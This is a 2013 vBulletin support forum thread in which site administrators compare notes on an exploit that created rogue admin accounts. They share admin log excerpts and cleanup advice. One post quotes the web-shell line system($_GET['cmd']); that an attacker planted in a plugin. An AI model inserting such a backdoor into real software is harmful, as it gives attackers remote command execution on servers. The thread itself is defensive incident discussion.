Announcement

**Lynne** · Wed 4th Sep '13, 9:57am

You can see what they were doing by looking in your Statistics & Logs > Control Panel Logs.

**HondaATC** · Wed 4th Sep '13, 10:04am

Right, I checked there and have'nt seen anything, but how deep does this go, were they able to access the database directly, cpanel, etc. etc?

**jscherbel** · Wed 4th Sep '13, 10:47am

I had the same things and did the same steps (removing /install and deleting the three new administrator accounts). Interested to know from the greater community whether anyone has found that anything else was done with these user accounts.

**contemptx** · Wed 4th Sep '13, 11:49am

Several of my forums were affected by this exploit, however only one of the forums had activity from the hacked user which was them grabbing the email list.

44237 support 22:27, 3rd Sep 2013 email.php makelist 99.227.104.35
44236 support 22:27, 3rd Sep 2013 email.php genlist 99.227.104.35

**Wayne Luke** · Wed 4th Sep '13, 11:55am

Originally posted by HondaATC View Post

Right, I checked there and have'nt seen anything, but how deep does this go, were they able to access the database directly, cpanel, etc. etc?

They would need to create a plugin or something to have additional access outside the AdminCP. However once in the AdminCP, that could be possible. You would need to check your plugins to make sure none of them are new or not what you installed.

**EvilArcana** · Wed 4th Sep '13, 5:28pm

I was hacked this morning...not sure if it was this exploit or not, but I had an admin user that created a default plugin that was an ajax start that did the following:

system($_GET['cmd']);

I've deleted the user...

He replaced my index.php with some text that said "HACKED...Fix yo s**t" only it wasn't censored...From what I can tell, that's the only damage that was done. Is this the kind of activity you would expect from this exploit? Should I submit a ticket to get someone to look into further damages and issues? It looks like the individual was sending a warning or something for us to tighten up on security or something.

I mainly want to make sure I got rid of all the back doors he may have put in. The plugin that had the system command in it existed twice.

There's some other stuff that he did, but I'm not sure how to get the details and what I shoudl look for...here's my admin log:

http://pastebin.com/FJ8DkhPp

**HondaATC** · Thu 5th Sep '13, 10:09am

Originally posted by Wayne Luke View Post

They would need to create a plugin or something to have additional access outside the AdminCP. However once in the AdminCP, that could be possible. You would need to check your plugins to make sure none of them are new or not what you installed.

My administrative log did not indicate there were any plugins modified/uploaded, and pruning it is locked via the config file. Am I safe to assume nothing else happened then?

**Pingu** · Fri 6th Sep '13, 2:11am

Suffering the same sort of hack. A plugin was added to our vB (ajax_complete), which through ajap.php, provided the hacker access to system commands. I've checked the access_log and nothing happened after a "uname -a". Except that another ip address (both ip addresses belong to Leaseweb Netherlands) has accessed the same ajax.php with the same uname command. No other commands have been run though ajax.php. The error_log shows they were trying to mess with the database though trough vb_database_alter, amongst other things.

vB has been cleaned up, ip addresses have been added to the firewall (for what is worth).

Still, check your access and error logs if you suffered the same. Whatever's been done might go further then the vB control panel logs will show.

**HondaATC** · Sat 7th Sep '13, 8:14am

I don't have any ip address to cross reference with the registration I had happen though unfortunately...

**Pingu** · Sat 7th Sep '13, 10:01am

If you have apache logs (or whatever webserver you run), look for ip addresses accessing install/upgrade.php. That'll give you a clue, I guess

vBulletin 4 End of Life

Announcement

Exploit Questions

[CMS] Exploit Questions

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment